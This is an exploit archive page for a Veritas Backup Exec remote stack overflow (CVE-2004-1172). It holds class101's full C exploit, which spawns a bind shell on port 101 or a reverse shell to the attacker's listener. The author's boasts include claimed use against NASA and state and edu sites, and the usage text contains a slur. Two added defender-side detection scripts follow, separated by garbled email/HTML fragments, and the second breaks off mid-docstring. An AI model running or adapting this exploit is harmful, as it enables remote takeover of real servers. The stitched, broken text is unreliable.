
veritasABS.c

Posted Jan 12, 2005
Authored by class101

Remote stack overflow exploit for Veritas Backup Exec. Works for versions 9.1.4691.SP1, 9.1.4691.SP0, and 8.5.3572. Binds a shell to port 101 or spawns a reverse shell to a listener.

tags | exploit, remote, overflow, shell
advisories | CVE-2004-1172
SHA-256 | 66d099090c243e36b9f7564b05d434f6f4b2b0d4406b819eb60322f646d6b2fc

Because k-otik are poor losers not respecting the publication of metasploit 2.3, I'm forced to post my code.

/*
VERITAS Backup Exec v9.1.4691.SP1
                    v9.1.4691.SP0
                    v8.5.3572
Agent Browser Service, Remote Stack Overflow

Highly Critical

All credits to:

-iDEFENSE (discovery - www.iDEFENSE.com),
-Thor Doomen (iat-syscall[at]inbox.lv),
-H.D. Moore (scode - www.metasploit.com),
-Matt Miller (scode - www.hick.org)

ExtraNotes:

All my tests/debugs were a bit long (some days), firstly due to the big size
of Backup Exec and the instability across different Windows versions
in making that IAT method work with 100% success, and the difficulty to debug it.
(As a recall, due to the only 60 bytes free, a tiny shellcode is sent first to scan
the recv function of benetns.exe and jump to the data submitted during the second send,
thanx syscall.) Let's think large now. Imagine that you exploit the hole and you submit
the shellcode 5 minutes later: the service will hang to death of course until a kill.
Now imagine that you exploit the hole and you submit the shellcode too fast for the
computer processing: the shellcode can be missed, won't be executed again,
sometimes yes/no, but really unstable.
Hopefully (or unfortunately for you admin :>) I'm here to optimize it and make it 100% working, universal,
stable, whatever you want, for the good fortune of script kiddies and to show what working means to my good
friends ka-odick :>

                                                   Tries
  Machine                               Bind / Reverse / Success

 (2x) Win2k SP4     Server English        10       10        20
 (1x) Win2k SP4     Pro    English         5        5        10
 (1x) WinXP SP1     Pro    English         5        5        10
 (1x) WinXP SP1a    Pro    English         5        5        10
 (3x) Win2003 SP0   Server English         5        5        10
 (1x) Win2003 SP0   Server Ita.            5        5        10
 (1x) NT4           Server English.        5        5        10

                    = Universal

v0.1:
C code based on Thor Doomen's code posted at the metasploit mailing list,
excellent in the method, but super unstable, to not say not working, when used;
made some changes.

v0.2:
fix of the first big problem, the missed shellcode across different Windows,
fixed by flooding benetns with more sends, timer really small, this is important.
padding 1 nop to the reverse shellcode as needed, else crash on reverse.

v0.3:
universal esi call across v9.1 SP0 and SP1, for the good fortune of script kiddies.

v0.4:
As a warning, this poc v0.4 has been tested working by an anonymous tester (never mentioned there)
on some organisations such as nasa, states/edus; it's urgent to update 1 month after the advisory, sleepers.

Tips: -make sure that your ip is safe of null bytes in reverse mode.
      -make sure that you target the good version of Backup Exec,
       else you crash it.
      -Backup Exec v10.0 is now available, get it at www.veritas.com.
      -Visit dfind.kd-team.com for a patched benetns.exe, quick solution
       for an urgent update. (extracted from the hotfix at www.veritas.com)
       Backup Exec 9.x is tested safe after replacing the .exe

Greetings:
   Nima Majidi
   Behrang Fouladi
   Pejman
   keystr0ke
   JGS
   DiabloHorn
   kimatrix
   NaV
   New Metasploit v2.3 (http://www.metasploit.com/)
   and all idlers of #n3ws on Eris Free Network.

by class101 [at] hat-squad.com
answering to all stupid questions that I got & will have: no, I'm not Persian and you don't care where I come from.

04 January 2005
*/
#include <stdio.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif

/* second stage, reverse mode: Matt Miller's 'skape' shellcode.
   main() patches the listener IP into scode1[282] and the port into scode1[289]. */
char scode1[]=
"\x90" // pad needed there for me; if you get scode detection problems on slow connections,
// try to add more NOP and make sure to update the memcpys later in the code.
"\xeb\x6e\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0d\x56\x8b\x40\x0c\x8b\x70\x1c\xad"
"\x8b\x40\x08\x5e\xc3\x8b\x40\x34\x83\xc0\x7c\x8b\x40\x3c\xc3\x60\x8b\x6c\x24\x24"
"\x8b\x45\x3c\x8b\x7c\x05\x78\x03\xfd\x8b\x4f\x18\x8b\x5f\x20\x03\xdd\xe3\x33\x49"
"\x8b\x34\x8b\x03\xf5\x33\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x03\xd0\xeb"
"\xf4\x3b\x54\x24\x28\x75\xe2\x8b\x5f\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5f\x1c\x03"
"\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c\x61\xc3\xeb\x35\xad\x50\x52\xe8\xa9\xff"
"\xff\xff\x89\x07\x83\xc4\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72"
"\xfe\xb3\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xec\xf9\xaa\x60\xcb"
"\xed\xfc\x3b\xe7\x79\xc6\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\xff\xff"
"\xff\x5e\xe8\x47\xff\xff\xff\x8b\xd0\x83\xee\x2e\x8d\x7d\x04\x8b\xce\x83\xc1\x10"
"\xe8\xa5\xff\xff\xff\x83\xc1\x10\x33\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f"
"\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59\x8b\xd0\xe8\x85\xff\xff\xff\xb8\x01\x63"
"\x6d\x64\xc1\xf8\x08\x50\x89\x65\x30\x33\xc0\x66\xb8\x90\x01\x2b\xe0\x54\x83\xc0"
"\x72\x50\xff\x55\x1c\x33\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x14\x8b\xf0"
"\x68\x7f\x01\x01\x01\xb8\x02\x01\x11\x5c\xfe\xcc\x50\x8b\xdc\x33\xc0\xb0\x10\x50"
"\x53\x56\xff\x55\x18\x33\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa\x5f\xc6"
"\x07\x44\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x5f\x33\xc0\x8d\x77\x44"
"\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x75\x30\x50\xff\x55\x08\xf7\xd0\x50"
"\xff\x36\xff\x55\x10\xff\x77\x38\xff\x55\x20\xff\x55\x0c\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";


/* second stage, bind mode: H.D. Moore's shellcode (cmd shell on port 101). */
char scode2[]=
// "\x90" uncomment this if you have scode detection problems on slow connections, or try more NOP,
// but for me and some other guys it's already fine like this.
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90";

static char payload[800];
/* per-version addresses that main() copies into talk[37] (IAT pointer) and talk[72] (esi call) */
char v91sp0sp1[]="\xFF\x50\x11\x40";
char esisp0sp1[]="\xA1\xFF\x42\x01";
char v85[]="\xFF\x38\x11\x40";
char esiold[]="\xB9\x08\x43\x01";

/* first stage: the 60-byte scanner that finds benetns.exe's recv and jumps to the next send */
char talk[] =
"\x02\x00\x32\x00"
"\x90\x90\x90\x90"
"\x31\xF6\xC1\xEC\x0C\xC1\xE4\x0C\x89\xE7\x89\xFB\x6A\x01\x8B\x74"
"\x24\xFE\x31\xD2\x52\x42\xC1\xE2\x10\x52\x57\x56\xB8\x00\x00\x00"
"\x00\xC1\xE8\x08\xFF\x10\x85\xC0\x79\x07\x89\xDC\x4E\x85\xF6\x75"
"\xE1\xFF\xE7\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x00"
"1.1.1.1.1.1"
"\x00"
"\xEB\x80";

#ifdef WIN32
WSADATA wsadata;
#endif

void ver();
void usage(char* us);

int main(int argc,char *argv[])
{
    ver();
    unsigned long gip;
    unsigned short gport;
    char *os;
    if (argc>6||argc<3||atoi(argv[1])>2||atoi(argv[1])<1){usage(argv[0]);return -1;}
    if (argc==5){usage(argv[0]);return -1;}
    if (strlen(argv[2])<7){usage(argv[0]);return -1;}
    if (argc==6)
    {
        if (strlen(argv[4])<7){usage(argv[0]);return -1;}
    }
#ifndef WIN32
    if (argc==6)
    {
        gip=inet_addr(argv[4])^(long)0x00000000;
        gport=htons(atoi(argv[5]))^(short)0x0000;
    }
#define Sleep sleep
#define SOCKET int
#define closesocket(s) close(s)
#else
    if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
    if (argc==6)
    {
        gip=inet_addr(argv[4])^(ULONG)0x00000000;
        gport=htons(atoi(argv[5]))^(USHORT)0x0000;
    }
#endif
    int ip=htonl(inet_addr(argv[2])), port;
    if (argc==4||argc==6){port=atoi(argv[3]);} else port=6101;
    SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
    s=socket(AF_INET,SOCK_STREAM,0);
    if (s==-1){printf("[+] socket() error\n");return -1;}
    /* select the per-version addresses for the first stage */
    if (atoi(argv[1])==1) {memcpy(&talk[37], &v91sp0sp1, 4);memcpy(&talk[72], &esisp0sp1, 4);os="Backup Exec v9.1.4691.1\n[+] Backup Exec v9.1.4691.0";}
    else {memcpy(&talk[37], &v85, 4);memcpy(&talk[72], &esiold, 4);os="Backup Exec v8.5.3572";}
    if (argc==6)
    {
        /* reverse mode: listener IP and port go into the skape shellcode */
        memcpy(&scode1[282], &gip, 4);
        memcpy(&scode1[289], &gport, 2);
        strcat(payload,scode1);
    }
    else strcat(payload,scode2);
    printf("[+] target(s): %s\n",os);
    server.sin_family=AF_INET;
    server.sin_addr.s_addr=htonl(ip);
    server.sin_port=htons(port);
    connect(s,( struct sockaddr *)&server,sizeof(server));
    timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
    switch(select(s+1,NULL,&mask,NULL,&timeout))
    {
    case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
    case 0: {printf("[+] connect() error\n");closesocket(s);return -1;}
    default:
        if(FD_ISSET(s,&mask))
        {
            printf("[+] connected, constructing the payload...\n");
            if (send(s,talk,sizeof(talk)-1,0)==-1) { printf("[+] sending error 1, the server prolly rebooted.\n");return -1;}

            /* the second stage is flooded with a small timer (see v0.2 notes) */
#ifdef WIN32
            Sleep(10);
#else
            Sleep(1/100); /* integer division: this is sleep(0) on non-Windows builds */
#endif
            if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 2, the server is patched.\n");return -1;}

#ifdef WIN32
            Sleep(10);
#else
            Sleep(1/100);
#endif
            if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 3, the server is patched.\n");return -1;}

#ifdef WIN32
            Sleep(10);
#else
            Sleep(1/100);
#endif
            if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 4, the server is patched.\n");return -1;}

#ifdef WIN32
            Sleep(10);
#else
            Sleep(1/100);
#endif
            if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 5, the server is patched.\n");return -1;}

#ifdef WIN32
            Sleep(10);
#else
            Sleep(1/100);
#endif
            if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 6, the server is patched.\n");return -1;}

#ifdef WIN32
            Sleep(10);
#else
            Sleep(1/100);
#endif
            if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 7, the server is patched.\n");return -1;}

#ifdef WIN32
            Sleep(10);
#else
            Sleep(1/100);
#endif
            if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 8, the server is patched.\n");return -1;}
#ifdef WIN32
            Sleep(1000);
#else
            Sleep(1);
#endif
            printf("[+] size of payload: %d\n",(sizeof(talk)-1)+strlen(payload)*7);
            printf("[+] payload sent.\n");
            return 0;
        }
    }
    closesocket(s);
#ifdef WIN32
    WSACleanup();
#endif
    return 0;
}


void usage(char* us)
{
    printf("USAGE:\n");
    printf(" [+] . 101_BXEC.exe Version VulnIP\n");
    printf(" [+] . 101_BXEC.exe Version VulnIP VulnPORT\n");
    printf(" [+] . 101_BXEC.exe Version VulnIP VulnPORT GayIP GayPORT\n");
    printf("VERSION: \n");
    printf(" [+] 1. Backup Exec v9.1.4691.SP1\n");
    printf(" [+] 1. Backup Exec v9.1.4691.SP0\n");
    printf(" [+] 2. Backup Exec v8.5.3572\n");
    printf("TARGET: \n");
    printf(" [+] . 2k3/2k/XP/NT4 universal (*)\n");
    printf("NOTE: \n");
    printf(" The exploit bind a cmdshell port 101 or\n");
    printf(" reverse a cmdshell on your listener.\n");
    printf(" A wildcard (*) mean tested working.\n");
    printf(" Compilation msvc6, cygwin, Linux.\n");
    return;
}

void ver()
{
    printf("\n");
    printf(" ====================================================[0.4]========\n");
    printf(" =================VERITAS Backup Exec 8.x/9.x=================\n");
    printf(" =========Agent Browser Service, Remote Stack Overflow========\n");
    printf(" ======coded by class101=============[Hat-Squad.com 2005]=====\n");
    printf(" ==============================================================\n");
    printf("\n");
}

-------------------------------------------------------------
class101
Hat-Squad.com
-------------------------------------------------------------
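A defender-side signature check for the two-stage traffic the notes above describe, written as an added example (it is not part of class101's code or of the Metasploit module): the header, per-version addresses and `jmp short` tail of the `talk` buffer, the skape stager prefix of scode1 with the listener address at offsets 282/289, and the xor-0x88 decoder stub of scode2. The sample messages are constructed and shortened, and the listener address is a TEST-NET value.

```python
"""Signature check for the two-stage benetns.exe overflow traffic (CVE-2004-1172).

Added example for detection and incident response; constants come from the
exploit listing above, sample messages are constructed.
"""
import re
import socket
import struct
from typing import List, NamedTuple, Optional, Tuple

# Stage 1: the `talk` buffer. Offsets 37 and 72 receive the per-version
# addresses below; the buffer ends with a short backward jump into the sled.
STAGE1_HEADER = b"\x02\x00\x32\x00"
STAGE1_TAIL = b"\xEB\x80"
VERSION_ADDRS = {
    b"\xFF\x50\x11\x40": "v9.1.4691 SP0/SP1 IAT address",
    b"\xA1\xFF\x42\x01": "v9.1.4691 SP0/SP1 esi call",
    b"\xFF\x38\x11\x40": "v8.5.3572 IAT address",
    b"\xB9\x08\x43\x01": "v8.5.3572 esi call",
}
NOP_SLED = re.compile(rb"\x90{16,}")

# Stage 2, reverse mode: scode1 opens with the skape stager and carries the
# listener at offset 282 (IP via inet_addr) and 289 (port via htons):
# push <ip> ; mov eax, imm32 ; dec ah  ->  sockaddr_in with sin_family=2.
REVERSE_PREFIX = b"\xeb\x6e\x33\xc0\x64\x8b\x40\x30"
CONNECT_BACK = re.compile(rb"\x68(.{4})\xb8\x02\x01(.{2})\xfe\xcc", re.DOTALL)
# Stage 2, bind mode: scode2 starts with a xor-0x88 decoder that stops at "hack".
BIND_PREFIX = b"\xEB\x0F\x58\x80\x30\x88\x40\x81\x38hack"


class Alert(NamedTuple):
    stage: str
    indicators: List[str]
    callback: Optional[str]  # "ip:port" of the attacker's listener, if any


def inspect_stage1(data: bytes) -> List[str]:
    """Name every first-stage indicator present in one message."""
    found = []
    if data.startswith(STAGE1_HEADER):
        found.append("agent browser header")
    found += [name for addr, name in VERSION_ADDRS.items() if addr in data]
    if NOP_SLED.search(data):
        found.append("NOP sled")
    if data.endswith(STAGE1_TAIL):
        found.append("jmp short -0x80 tail")
    return found


def inspect_stage2(data: bytes) -> Tuple[List[str], Optional[str]]:
    """Return (indicators, listener) for a candidate second-stage message."""
    found, callback = [], None
    body = data.lstrip(b"\x90")  # scode1 is padded with a leading NOP
    if body.startswith(REVERSE_PREFIX):
        found.append("skape reverse-shell stager")
        m = CONNECT_BACK.search(body)
        if m:  # recover the connect-back target for blocking and hunting
            ip = socket.inet_ntoa(m.group(1))
            port = struct.unpack("!H", m.group(2))[0]
            callback = f"{ip}:{port}"
            found.append("connect-back sockaddr")
    if body.startswith(BIND_PREFIX):
        found.append("xor-0x88 bind-shell decoder (port 101)")
    return found, callback


def scan_session(messages: List[bytes]) -> List[Alert]:
    """Run both checks over the messages of one TCP session to benetns.exe.

    A stage-1 alert needs at least two independent indicators, so a normal
    request that merely shares the 4-byte header is not flagged.
    """
    alerts = []
    for msg in messages:
        s1 = inspect_stage1(msg)
        if len(s1) >= 2:
            alerts.append(Alert("stage1-overflow", s1, None))
            continue
        s2, cb = inspect_stage2(msg)
        if s2:
            alerts.append(Alert("stage2-shellcode", s2, cb))
    return alerts


# Constructed samples (not captures): the talk/scode1 layout with the
# exploit's own constants, shortened, and a TEST-NET listener address.
SAMPLE_BENIGN = STAGE1_HEADER + b"BACKUPSRV01\x00"
SAMPLE_STAGE1 = (STAGE1_HEADER + b"\x90" * 4
                 + b"\xB8" + b"\xFF\x50\x11\x40" + b"\xC1\xE8\x08\xFF\x10"
                 + b"\x90" * 32 + b"\xA1\xFF\x42\x01" + b"\x90" * 16
                 + b"\x00" + b"1.1.1.1.1.1" + b"\x00" + STAGE1_TAIL)
SAMPLE_STAGE2 = (b"\x90" + REVERSE_PREFIX + b"\x90" * 24
                 + b"\x68" + socket.inet_aton("203.0.113.10")
                 + b"\xb8\x02\x01" + struct.pack("!H", 4444) + b"\xfe\xcc"
                 + b"\x90" * 16)

if __name__ == "__main__":
    for alert in scan_session([SAMPLE_BENIGN, SAMPLE_STAGE1, SAMPLE_STAGE2]):
        print(alert)
```

The two-indicator threshold on stage 1 is deliberate: the page shows only the exploit's own message, so the 4-byte header alone cannot be assumed unique to malicious traffic.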

<BR>&nbsp;printf("USAGE:\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;=20
[+]&nbsp; . 101_BXEC.exe Version=20
VulnIP\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [+]&nbsp; .=20
101_BXEC.exe Version VulnIP=20
VulnPORT\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [+]&nbsp; =
.=20
101_BXEC.exe Version VulnIP VulnPORT GayIP=20
GayPORT\n");<BR>&nbsp;printf("VERSION:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =

\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [+] 1. Backup Exec =

v9.1.4691.SP1\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [+] =
1. Backup=20
Exec v9.1.4691.SP0\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
[+] 2.=20
Backup Exec=20
v8.5.3572\n");<BR>&nbsp;printf("TARGET:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
=20
\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [+]&nbsp; . =
2k3/2k/XP/NT4=20
universal=20
(*)\n");<BR>&nbsp;printf("NOTE:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; The exploit bind a =

cmdshell port 101 =
or\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
reverse a cmdshell on your=20
listener.\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; A =
wildcard (*)=20
mean tested =
working.\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
Compilation msvc6, cygwin, Linux.\n");<BR>&nbsp;return;<BR>} <BR>void=20
ver()<BR>{&nbsp;<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D[0.4=
]=3D=3D=3D=3D=3D=3D=3D=3D\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;=20
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3DVERITAS Backup Exec =
8.x/9.x=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\n");=20
<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
=3D=3D=3D=3D=3D=3D=3D=3D=3DAgent=20
Browser Service, Remote Stack=20
Overflow=3D=3D=3D=3D=3D=3D=3D=3D\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;=20
=3D=3D=3D=3D=3D=3Dcoded by =
class101=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D[Hat-Squad.com=20
2005]=3D=3D=3D=3D=3D\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;=20
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;=20
\n");<BR>}<BR></FONT></DIV>
<DIV><FONT face=3DArial=20
size=3D2>-------------------------------------------------------------<BR=
>class101<BR>Hat-Squad.com<BR>-------------------------------------------=
------------------</FONT></DIV></BODY></HTML>

------=_NextPart_000_003D_01C4F7DA.972C2380--
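The send loop in the code above has an observable shape on the wire: one short handshake message, then the same large payload repeated seven times about 10 ms apart (the exploit resends to cope with the timing instability the author describes). A sensor that keeps per-connection application-data chunks can flag exactly that repetition. The following detector is an added example written for this page; it is not part of class101's exploit and not vendor code. The record layout, the client addresses, the service port (10000 is a constructed placeholder, not the Backup Exec agent port) and the sample chunks are all constructed for the example.

```python
"""Flag identical application payloads repeated in a short burst to one service.

Added example for this page, not the exploit's own code. Record fields and
sample values are constructed; port 10000 is a placeholder.
"""
import hashlib
from dataclasses import dataclass

SERVICE_PORT = 10000  # constructed placeholder for the monitored service port


@dataclass(frozen=True)
class DataChunk:
    ts: float       # seconds since capture start (constructed)
    src: str        # client address
    dst_port: int   # destination service port
    data: bytes     # application-layer bytes carried by the segment(s)


def chunk_fingerprint(data: bytes) -> str:
    """Short stable fingerprint so identical payloads compare cheaply."""
    return hashlib.sha256(data).hexdigest()[:16]


def find_payload_bursts(chunks, min_repeats=7, window_s=1.0, min_len=256):
    """Return (src, dst_port, fingerprint, count) tuples for every
    (src, dst_port) pair that sent the same payload of at least min_len
    bytes min_repeats times within any window_s-second window.

    Small chunks (handshakes, keepalives) are ignored so that ordinary
    chatty protocols do not trigger on short repeated messages."""
    by_key = {}
    for c in sorted(chunks, key=lambda c: c.ts):
        if len(c.data) < min_len:
            continue
        key = (c.src, c.dst_port, chunk_fingerprint(c.data))
        by_key.setdefault(key, []).append(c.ts)

    hits = []
    for (src, port, fp), times in by_key.items():
        lo = 0
        # sliding window over the sorted timestamps of one identical payload
        for hi in range(len(times)):
            while times[hi] - times[lo] > window_s:
                lo += 1
            if hi - lo + 1 >= min_repeats:
                hits.append((src, port, fp, hi - lo + 1))
                break
    return hits


def sample_chunks():
    """Constructed capture: one client mirrors the exploit's delivery pattern
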